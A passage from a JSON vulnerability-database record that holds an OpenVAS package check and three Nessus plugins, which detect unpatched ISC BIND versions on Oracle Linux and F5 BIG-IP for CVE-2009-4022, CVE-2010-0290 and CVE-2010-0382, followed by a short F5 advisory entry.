version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2010-0062\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2010-0062.html\");\n script_cve_id(\"CVE-2010-0097\", \"CVE-2010-0290\", \"CVE-2010-0382\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.3.6~4.P1.el5_4.2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.3.6~4.P1.el5_4.2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.3.6~4.P1.el5_4.2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-libbind-devel\", rpm:\"bind-libbind-devel~9.3.6~4.P1.el5_4.2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.3.6~4.P1.el5_4.2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.3.6~4.P1.el5_4.2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.3.6~4.P1.el5_4.2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"caching-nameserver\", rpm:\"caching-nameserver~9.3.6~4.P1.el5_4.2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2019-02-21T01:22:40", "bulletinFamily": "scanner", "description": "ISC BIND 9.0.x through 9.3.x, 9.4 before 9.4.3-P5, 9.5 before 9.5.2-P2, 9.6 before 9.6.1-P3, and 9.7.0 beta handles out-of-bailiwick data accompanying a secure response without re-fetching from the original source, which allows remote attackers to have an unspecified impact via a crafted response, aka Bug 20819. NOTE: this vulnerability exists because of a regression during the fix for CVE-2009-4022.", "modified": "2019-01-04T00:00:00", "id": "F5_BIGIP_SOL15787.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=78835", "published": "2014-11-04T00:00:00", "title": "F5 Networks BIG-IP : BIND vulnerability (SOL15787)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution SOL15787.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78835);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/01/04 10:03:40\");\n\n script_cve_id(\"CVE-2009-4022\", \"CVE-2010-0382\");\n script_bugtraq_id(37118);\n\n script_name(english:\"F5 Networks BIG-IP : BIND vulnerability (SOL15787)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"ISC BIND 9.0.x through 9.3.x, 9.4 before 9.4.3-P5, 9.5 before\n9.5.2-P2, 9.6 before 9.6.1-P3, and 9.7.0 beta handles out-of-bailiwick\ndata accompanying a secure response without re-fetching from the\noriginal source, which allows remote attackers to have an unspecified\nimpact via a crafted response, aka Bug 20819. NOTE: this vulnerability\nexists because of a regression during the fix for CVE-2009-4022.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K15787\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution SOL15787.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"SOL15787\";\nvmatrix = make_array();\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"10.1.0\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"11.0.0-11.6.0\",\"10.2.0-10.2.4\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"10.0.0-10.1.0\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"11.0.0-11.6.0\",\"10.2.0-10.2.4\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"10.0.0-10.1.0\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"11.0.0-11.6.0\",\"10.2.0-10.2.4\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"10.0.0-10.1.0\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"11.0.0-11.6.0\",\"10.2.0-10.2.4\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"10.0.0-10.1.0\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"11.0.0-11.6.0\",\"10.2.0-10.2.4\");\n\n# PSM\nvmatrix[\"PSM\"] = make_array();\nvmatrix[\"PSM\"][\"affected\" ] = make_list(\"10.0.0-10.1.0\");\nvmatrix[\"PSM\"][\"unaffected\"] = make_list(\"11.0.0-11.4.1\",\"10.2.0-10.2.4\");\n\n# WAM\nvmatrix[\"WAM\"] = make_array();\nvmatrix[\"WAM\"][\"affected\" ] = make_list(\"10.0.0-10.1.0\");\nvmatrix[\"WAM\"][\"unaffected\"] = make_list(\"11.0.0-11.3.0\",\"10.2.0-10.2.4\");\n\n# WOM\nvmatrix[\"WOM\"] = make_array();\nvmatrix[\"WOM\"][\"affected\" ] = make_list(\"10.0.0-10.1.0\");\nvmatrix[\"WOM\"][\"unaffected\"] = make_list(\"11.0.0-11.3.0\",\"10.2.0-10.2.4\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:22:38", "bulletinFamily": "scanner", "description": "Unspecified vulnerability in ISC BIND 9.0.x through 9.3.x, 9.4 before 9.4.3-P5, 9.5 before 9.5.2-P2, 9.6 before 9.6.1-P3, and 9.7.0 beta, with DNSSEC validation enabled and checking disabled (CD), allows remote attackers to conduct DNS cache poisoning attacks by receiving a recursive client query and sending a response that contains (1) CNAME or (2) DNAME records, which do not have the intended validation before caching, aka Bug 20737. NOTE: this vulnerability exists because of an incomplete fix for CVE-2009-4022. (CVE-2010-0290)", "modified": "2019-01-04T00:00:00", "id": "F5_BIGIP_SOL15748.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=78697", "published": "2014-10-28T00:00:00", "title": "F5 Networks BIG-IP : BIND vulnerability (SOL15748)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution SOL15748.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78697);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/01/04 10:03:40\");\n\n script_cve_id(\"CVE-2009-4022\", \"CVE-2010-0290\");\n script_bugtraq_id(37118);\n\n script_name(english:\"F5 Networks BIG-IP : BIND vulnerability (SOL15748)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Unspecified vulnerability in ISC BIND 9.0.x through 9.3.x, 9.4 before\n9.4.3-P5, 9.5 before 9.5.2-P2, 9.6 before 9.6.1-P3, and 9.7.0 beta,\nwith DNSSEC validation enabled and checking disabled (CD), allows\nremote attackers to conduct DNS cache poisoning attacks by receiving a\nrecursive client query and sending a response that contains (1) CNAME\nor (2) DNAME records, which do not have the intended validation before\ncaching, aka Bug 20737. NOTE: this vulnerability exists because of an\nincomplete fix for CVE-2009-4022. (CVE-2010-0290)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K15748\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution SOL15748.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"SOL15748\";\nvmatrix = make_array();\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"10.1.0\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"11.0.0-11.6.0\",\"10.2.0-10.2.4\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"10.0.0-10.1.0\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"11.0.0-11.6.0\",\"10.2.0-10.2.4\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"10.0.0-10.1.0\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"11.0.0-11.6.0\",\"10.2.0-10.2.4\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"10.0.0-10.1.0\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"11.0.0-11.6.0\",\"10.2.0-10.2.4\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"10.0.0-10.1.0\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"11.0.0-11.6.0\",\"10.2.0-10.2.4\");\n\n# PSM\nvmatrix[\"PSM\"] = make_array();\nvmatrix[\"PSM\"][\"affected\" ] = make_list(\"10.0.0-10.1.0\");\nvmatrix[\"PSM\"][\"unaffected\"] = make_list(\"11.0.0-11.4.1\",\"10.2.0-10.2.4\");\n\n# WAM\nvmatrix[\"WAM\"] = make_array();\nvmatrix[\"WAM\"][\"affected\" ] = make_list(\"10.0.0-10.1.0\");\nvmatrix[\"WAM\"][\"unaffected\"] = make_list(\"11.0.0-11.3.0\",\"10.2.0-10.2.4\");\n\n# WOM\nvmatrix[\"WOM\"] = make_array();\nvmatrix[\"WOM\"][\"affected\" ] = make_list(\"10.0.0-10.1.0\");\nvmatrix[\"WOM\"][\"unaffected\"] = make_list(\"11.0.0-11.3.0\",\"10.2.0-10.2.4\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_warning(port:0, extra:bigip_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:22:30", "bulletinFamily": "scanner", "description": "Unspecified vulnerability in ISC BIND 9.4 before 9.4.3-P4, 9.5 before 9.5.2-P1, 9.6 before 9.6.1-P2, 9.7 beta before 9.7.0b3, and 9.0.x through 9.3.x with DNSSEC validation enabled and checking disabled (CD), allows remote attackers to conduct DNS cache poisoning attacks via additional sections in a response sent for resolution of a recursive client query, which is not properly handled when the response is processed 'at the same time as requesting DNSSEC records (DO).'", "modified": "2019-01-04T00:00:00", "id": "F5_BIGIP_SOL10898.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=78124", "published": "2014-10-10T00:00:00", "title": "F5 Networks BIG-IP : DNSSEC BIND vulnerability (SOL10898)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution SOL10898.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78124);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/01/04 10:03:40\");\n\n script_cve_id(\"CVE-2009-4022\");\n script_bugtraq_id(37118);\n\n script_name(english:\"F5 Networks BIG-IP : DNSSEC BIND vulnerability (SOL10898)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Unspecified vulnerability in ISC BIND 9.4 before 9.4.3-P4, 9.5 before\n9.5.2-P1, 9.6 before 9.6.1-P2, 9.7 beta before 9.7.0b3, and 9.0.x\nthrough 9.3.x with DNSSEC validation enabled and checking disabled\n(CD), allows remote attackers to conduct DNS cache poisoning attacks\nvia additional sections in a response sent for resolution of a\nrecursive client query, which is not properly handled when the\nresponse is processed 'at the same time as requesting DNSSEC records\n(DO).'\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K10898\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution SOL10898.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"SOL10898\";\nvmatrix = make_array();\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"10.1.0\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"9\",\"10.0.0-10.0.1\",\"10.2\",\"11\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"10.1.0\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"9\",\"10.0.0-10.0.1\",\"10.2\",\"11\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"10.1.0\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"9\",\"10.0.0-10.0.1\",\"10.2\",\"11\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"10.1.0\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"9\",\"10.0.0-10.0.1\",\"10.2\",\"11\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"10.1.0\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"9\",\"10.0.0-10.0.1\",\"10.2\",\"11\");\n\n# PSM\nvmatrix[\"PSM\"] = make_array();\nvmatrix[\"PSM\"][\"affected\" ] = make_list(\"10.1.0\");\nvmatrix[\"PSM\"][\"unaffected\"] = make_list(\"9\",\"10.0.0-10.0.1\",\"10.2\",\"11\");\n\n# WAM\nvmatrix[\"WAM\"] = make_array();\nvmatrix[\"WAM\"][\"affected\" ] = make_list(\"10.1.0\");\nvmatrix[\"WAM\"][\"unaffected\"] = make_list(\"9\",\"10.0.0-10.0.1\",\"10.2\",\"11\");\n\n# WOM\nvmatrix[\"WOM\"] = make_array();\nvmatrix[\"WOM\"][\"affected\" ] = make_list(\"10.1.0\");\nvmatrix[\"WOM\"][\"unaffected\"] = make_list(\"9\",\"10.0.0-10.0.1\",\"10.2\",\"11\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_note(port:0, extra:bigip_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "f5": [{"lastseen": "2016-11-09T00:09:48", "bulletinFamily": "software", "description": "Recommended action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x)\n * SOL10025: Managing BIG-IP product hotfixes (10.x)\n * SOL10942: Installing OPSWAT hotfixes on BIG-IP APM systems\n", "modified": "2014-10-27T00:00:00", "published": "2014-10-27T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/700/sol15748.html", "id": "SOL15748", "title": "SOL15748 - BIND vulnerability CVE-2010-0290", "type": "f5", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}]}